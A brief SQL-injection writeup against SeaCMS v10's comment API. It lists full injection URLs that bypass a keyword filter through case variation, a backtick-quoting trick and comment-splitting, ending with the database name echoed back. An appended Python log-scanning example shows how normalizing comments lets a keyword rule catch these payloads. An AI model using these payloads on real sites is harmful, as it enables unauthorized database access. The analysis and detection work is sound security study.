1. Environment: seacmsv10

2. Injection: http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=gzm
   Placeholder: gzm. Debug with PHPStorm, inspect the executed statement, and reproduce the concatenated statement in MySQL.

3. Inject again: http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1)union%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20#
   Found that letter case is not handled.

4. Inject again using case variation to bypass: http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1)UnIon%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20#
   Still filtered; start from the 80sec approach.

5. Inject using the 80sec technique: http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1%20or%20@`%27`%20UnIon%20select%201,2,3,4,5,6,7,8,9,10,11`%27`#'
   Successfully escaped the filter.

8. Inject again: http://www.seacmsv10.com/comment/api/index.php/comment/api/index.php?gid=1&page=2&type=1&rlist[]=1)//@**@`%27`**//unIoN--%0ASELECT%23%0A1,2,3,4,5,6,7,8,9,10,database()%23%0Afrom%23%0Asea_admin--%20%27
   Debugging process. The database name is successfully echoed back.
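A detection-side example, added here and not part of the original writeup or of SeaCMS: the same keyword rule is applied once to the decoded rlist[] value and once to a normalized form that strips MySQL comments and backtick-quoted names, over the query strings from the steps above (constructed as access-log samples). It assumes only the query string is available and that the rule is an illustrative log or WAF check, not SeaCMS's own filter.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed samples: the query strings from the writeup above, as logged.
SAMPLES = {
    "placeholder":   "gid=1&page=2&type=3&rlist[]=gzm",
    "union_lower":   "gid=1&page=2&type=3&rlist[]=1)union%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20#",
    "union_mixed":   "gid=1&page=2&type=3&rlist[]=1)UnIon%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20#",
    "backtick":      "gid=1&page=2&type=3&rlist[]=1%20or%20@`%27`%20UnIon%20select%201,2,3,4,5,6,7,8,9,10,11`%27`#'",
    "comment_split": "gid=1&page=2&type=1&rlist[]=1)//@**@`%27`**//unIoN--%0ASELECT%23%0A1,2,3,4,5,6,7,8,9,10,database()%23%0Afrom%23%0Asea_admin--%20%27",
}

# Illustrative rule (assumed, not SeaCMS's filter): UNION ... SELECT or SLEEP(.
KEYWORDS = re.compile(r"\bunion\s+(?:all\s+)?select\b|\bsleep\s*\(", re.I)


def normalize(value):
    """Approximate what MySQL's parser sees: decode, drop comments, drop `quoted` names."""
    prev = None
    while prev != value:                      # undo repeated percent-encoding
        prev, value = value, unquote(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)        # /* ... */ comments
    value = re.sub(r"--[ \t][^\n]*|--\n|#[^\n]*", " ", value)   # '-- ' and '#' line comments
    value = re.sub(r"`[^`]*`", " ", value)                      # backtick-quoted names such as `'`
    return re.sub(r"\s+", " ", value).lower()


def keyword_hit(query_string, normalized):
    """True if any parameter value matches KEYWORDS; normalized=True applies normalize() first."""
    for values in parse_qs(query_string, keep_blank_values=True).values():
        for v in values:
            if KEYWORDS.search(normalize(v) if normalized else v):
                return True
    return False


def scan(samples):
    """Map each sample name to (hit on decoded value, hit on normalized value)."""
    return {name: (keyword_hit(q, False), keyword_hit(q, True)) for name, q in samples.items()}


if __name__ == "__main__":
    for name, result in scan(SAMPLES).items():
        print(f"{name:14s} decoded={result[0]!s:5s} normalized={result[1]}")
```

The decoded-only check misses the last payload, where a `--` line comment sits between UNION and SELECT; stripping comments before matching is what makes the rule hold up.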